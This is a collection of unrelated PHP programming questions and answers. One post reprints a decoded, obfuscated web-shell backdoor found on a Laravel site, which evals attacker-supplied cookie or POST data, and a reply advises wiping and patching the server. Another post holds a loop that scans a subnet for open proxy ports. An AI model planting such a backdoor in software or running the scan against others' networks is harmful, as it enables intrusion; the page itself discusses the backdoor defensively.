The problem is simple. Running a php file in browser vs command line produces very different results and I can't for the life of me figure out why. Any php/psexec experts out there run into this before?
<?php
echo '<pre>';
$output = shell_exec("psexec -accepteula \\\mypcname -u mypcname\\accountname -p xxxxxxx ipconfig /all 2>&1");
var_dump($output);
echo '</pre>';
Produces this output in a browser window...
string(350) "
PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
Windows IP Configuration
Connecting to admin-pc...
Starting PSEXESVC service on admin-pc...
Connecting with PsExec service on admin-pc...
Starting ipconfig on admin-pc...
ipconfig exited on admin-pc with error code 0.
Instead of this, which is the output I get when running the same php file via command line.
C:\MAMP\bin\php\php5.5.12>php-cgi c:\mamp\htdocs\go.php
X-Powered-By: PHP/5.5.12
Content-type: text/html
hi<pre>string(5113) "
PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
Windows IP Configuration
Host Name . . . . . . . . . . . . : mypcname
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : home
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : home
Description . . . . . . . . . . . : Intel(R) 82567LM-2 Gigabit Network Connec
tion
Physical Address. . . . . . . . . : xx-xx-xx-xx-xx-xx
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 192.168.1.4(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Thursday, October 09, 2014 4:36:43 PM
Lease Expires . . . . . . . . . . : Tuesday, October 14, 2014 4:16:04 PM
Default Gateway . . . . . . . . . : 192.168.1.1
DHCP Server . . . . . . . . . . . : 192.168.1.1
DNS Servers . . . . . . . . . . . : 8.8.8.8
8.8.4.4
NetBIOS over Tcpip. . . . . . . . : Enabled
"
</pre>
C:\MAMP\bin\php\php5.5.12>
Related
while trying to generate dynamic sitemaps, I tried adding two variables in url path, and the line is giving me error
this is my sample line:
echo "<loc>" . $base_url . "category.php?category=" . $subFeaturedPostCatSlug . "&job=" . "$subFeaturedPostSlug" . "</loc>" . PHP_EOL;PHP_EOL;
I tried doing it like this also:
echo "<loc>{$base_url}category.php?category={$subFeaturedPostCatSlug}&job={$subFeaturedPostSlug}</loc>" . PHP_EOL;
error screenshot attached;
Any help will be appreciated, thanks in advance
Try this -
$str = $base_url . "category.php?category=" . $subFeaturedPostCatSlug . "&job=" . $subFeaturedPostSlug . "" . PHP_EOL;
echo htmlspecialchars_decode($str);
You should be able to fix this using the urlencode() function as mentioned in your comments.
So,
echo "<loc>" . $base_url . "category.php?category=" . $subFeaturedPostCatSlug . "&job=" . "$subFeaturedPostSlug" . "</loc>" . PHP_EOL;PHP_EOL;
becomes
echo "<loc>" . urlencode($base_url) . "category.php?category=" . urlencode($subFeaturedPostCatSlug) . "&job=" . urlencode($subFeaturedPostSlug) . "</loc>" . PHP_EOL.PHP_EOL;
More details at PHP Documentation for urlencode()
Also, I found out that there is error in your code:
echo "<loc>" . $base_url . "category.php?category=" . $subFeaturedPostCatSlug . "&job=" . "$subFeaturedPostSlug" . "</loc>" . PHP_EOL;PHP_EOL;
Towards the end of the echo, you have written:
...PHP_EOL;PHP_EOL;
which should ideally have been
...PHP_EOL.PHP_EOL;
For a customer I am maintaining a small group of websites built in PHP Laravel. Lately while working on these I have discovered a couple of new suspicious looking files, which suddenly appeared on two of the websites FTP servers. The files are not originally a part of the codebase, and I have no idea where they're coming from all of a sudden. There are three files in total, named b3lo5x3x.php, cache.php and plugin.php and they are located in the root directory of the websites.
The content of the files looks pretty disturbing. When decoded on unphp.net I get the following result, which is the exact same for all three files. The size of all three files are also the same.
<?php
$hguenpg = '8v7n\'kadeH62ycg_ti9pm1-fsb0#rxlu4*o';
$fvgiv = Array();
$fvgiv[] = $hguenpg[18] . $hguenpg[11] . $hguenpg[0] . $hguenpg[0] . $hguenpg[26] . $hguenpg[11] . $hguenpg[21] . $hguenpg[0] . $hguenpg[22] . $hguenpg[10] . $hguenpg[7] . $hguenpg[13] . $hguenpg[11] . $hguenpg[22] . $hguenpg[32] . $hguenpg[6] . $hguenpg[23] . $hguenpg[8] . $hguenpg[22] . $hguenpg[0] . $hguenpg[32] . $hguenpg[6] . $hguenpg[25] . $hguenpg[22] . $hguenpg[13] . $hguenpg[32] . $hguenpg[7] . $hguenpg[21] . $hguenpg[18] . $hguenpg[11] . $hguenpg[25] . $hguenpg[2] . $hguenpg[7] . $hguenpg[0] . $hguenpg[23] . $hguenpg[2];
$fvgiv[] = $hguenpg[9] . $hguenpg[33];
$fvgiv[] = $hguenpg[27];
$fvgiv[] = $hguenpg[13] . $hguenpg[34] . $hguenpg[31] . $hguenpg[3] . $hguenpg[16];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[15] . $hguenpg[28] . $hguenpg[8] . $hguenpg[19] . $hguenpg[8] . $hguenpg[6] . $hguenpg[16];
$fvgiv[] = $hguenpg[8] . $hguenpg[29] . $hguenpg[19] . $hguenpg[30] . $hguenpg[34] . $hguenpg[7] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[31] . $hguenpg[25] . $hguenpg[24] . $hguenpg[16] . $hguenpg[28];
$fvgiv[] = $hguenpg[6] . $hguenpg[28] . $hguenpg[28] . $hguenpg[6] . $hguenpg[12] . $hguenpg[15] . $hguenpg[20] . $hguenpg[8] . $hguenpg[28] . $hguenpg[14] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[30] . $hguenpg[8] . $hguenpg[3];
$fvgiv[] = $hguenpg[19] . $hguenpg[6] . $hguenpg[13] . $hguenpg[5];
foreach ($fvgiv[7]($_COOKIE, $_POST) as $lfpfzw => $wqudv) {
function dgubnv($fvgiv, $lfpfzw, $nclll) {
return $fvgiv[6]($fvgiv[4]($lfpfzw . $fvgiv[0], ($nclll / $fvgiv[8]($lfpfzw)) + 1), 0, $nclll);
}
function oocfo($fvgiv, $elasr) {
return #$fvgiv[9]($fvgiv[1], $elasr);
}
function yiugt($fvgiv, $elasr) {
$vezpr = $fvgiv[3]($elasr) % 3;
if (!$vezpr) {
eval($elasr[1]($elasr[2]));
exit();
}
}
$wqudv = oocfo($fvgiv, $wqudv);
yiugt($fvgiv, $fvgiv[5]($fvgiv[2], $wqudv ^ dgubnv($fvgiv, $lfpfzw, $fvgiv[8]($wqudv))));
} ?>
Does anyone know what this can be? Can it be that the FTP servers are infected with some kind of malware or hacking tools?
Wipe the machines affected completely. You need to reinstall the Laravel project(s) to a new clean machine. You also should audit them and any other software used if possible.
Make sure that all of the software on the server is updated too. Most likely you were compromised through a non updated software with a known vulnerability.
Few examples I've tried
// Worked
fopen($OutputFolderPath."Text.pdf", "w");
// Didn't work
$pdf->Output($OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . '_' . $Mother->PatientTableRecord['NHSID'] . ' ' . date('d_m_Y') . '.pdf','F'); // $OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . ' ' . date('d_m_Y h_i_s', time()) . '.pdf','F'
// Works with no PDF content inside
fopen($OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . '_' . $Mother->PatientTableRecord['NHSID'] . ' ' . date('d_m_Y') . '.pdf','F'); // $OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . ' ' . date('d_m_Y h_i_s', time()) . '.pdf','w');
// Worked
$pdf->Output('C:/ISOSEC/PDFS/' . ReplaceWindowsFileNameSpecialCharacters($Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . '_' . $Mother->PatientTableRecord['NHSID'] . ' ' . date('d_m_Y') . '.pdf'),'F'); // $OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . ' ' . date('d_m_Y h_i_s', time()) . '.pdf','F'
I'm trying to use the $OutputFolderPath
'$OutputFolderPath' Path:
//MIA-Test/htdocs/SharedFolder/MIA - Digital Post Natal Records/
Error:
fopen(file:////MIA-Test/htdocs/SharedFolder/MIA - Digital Post Natal Records/Fiona Appleton_1946546288 09_06_2015.pdf): failed to open stream: No such file or directory
Use this :
$a = file_get_contents('Text.pdf');
file_put_contents('new_text.pdf', $a);
I am using the following script to send data from a form to google analytics:
if ($result){
$var_utmac = 'UA-0000000-0';
$var_utmhn = 'my-site.com'; // domain
$var_utmn = rand(1000000000,9999999999); // random number
$var_cookie = rand(10000000,99999999); //random cookie number
$var_random = rand(1000000000,2147483647); //number under 2147483647
$var_today = time();
$var_referer = $_SERVER['HTTP_REFERER']; //referer url
if ($var_referer == '') { $var_referer = '-'; }
$var_uservar='-'; // no user-defined
$var_utmp= $_POST['REQUEST_URI'].'data_'. htmlentities($_POST['dataone']).'_'.htmlentities($_POST['datatwo']); // folder called no_jstracker to segment nojavascript visitors
$urchinUrl='http://www.google-analytics.com/__utm.gif?utmwv=3&utmn=' . $var_utmn . '&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=' . $var_utmhn . '&utmhid=' . $var_utmn . '&utmr=' . $var_referer . '&utmp=' . $var_utmp . '&utmac=' . $var_utmac . '&utmcc=__utma%3D' . $var_cookie . '.' . $var_random . '.' . $var_today . '.' . $var_today . '.' . $var_today . '.2%3B%2B__utmz%3D' . $var_cookie . '.' . $var_today . '.2.2.utmcsr%3D_SOURCE_%7Cutmccn%3D_CAMPAIGN_%7Cutmcmd%3D_MEDIUM_%7Cutmctr%3D_KEYWORD_%7Cutmcct%3D_CONTENT_%3B%2B__utmv%3D' . $var_cookie . '.' . $var_uservar . '%3B';
echo ' <img src="' . $urchinUrl . '" border="0" />';
}
While the data is being sent successfully there is one issue and that is that analytics doesn't show some of the data correctly i.e. for campaign data ist just shoes "CAMPAIGN" for keyword it shows "KEYWORD". It is clear where this happens in the script but am not sure how to fix it. Ideally of course analytics should populate that with its own data.
Any suggestions whether this is even possible?
i think this is happen because you hard coded "CAMPAIGN" value. instead of that assign value for campaign.
$CAMPAIGN='facebook';
$KEYWORD='testing';
$urchinUrl='http://www.google-analytics.com/__utm.gif?utmwv=3&utmn=' . $var_utmn . '&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=' . $var_utmhn . '&utmhid=' . $var_utmn . '&utmr=' . $var_referer . '&utmp=' . $var_utmp . '&utmac=' . $var_utmac . '&utmcc=__utma%3D' . $var_cookie . '.' . $var_random . '.' . $var_today . '.' . $var_today . '.' . $var_today . '.2%3B%2B__utmz%3D' . $var_cookie . '.' . $var_today . '.2.2.utmcsr%3D_SOURCE_%7Cutmccn%3D'.$CAMPAIGN.'%7Cutmcmd%3D_MEDIUM_%7Cutmctr%3D'.$KEYWORD.'%7Cutmcct%3D_CONTENT_%3B%2B__utmv%3D' . $var_cookie . '.' . $var_uservar . '%3B';
for more details about Google Analytics Cookies
I read the post here
Test if port open and forwarded using PHP
about how to scan ports of the same proxy . But my problem is I want to do scan the same port of different ip xxx.xxx.xxx.$i and for loop i try to run it from 0 to 255 . I use the same script in the above mentioned post using for loop . But it takes too long to get the answer (actually I dont get any) . Here is the code
for($i=0;$i<2;$i++){
$host = 'xxx.xxx.xxx.'.$i;
$connection = #fsockopen($host, 3128);
if (is_resource($connection))
{
echo '<h2>' . $host . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.</h2>' . "\n";
fclose($connection);
}
else
{
echo '<h2>' . $host . ':' . $port . ' is not responding.</h2>' . "\n";
}
}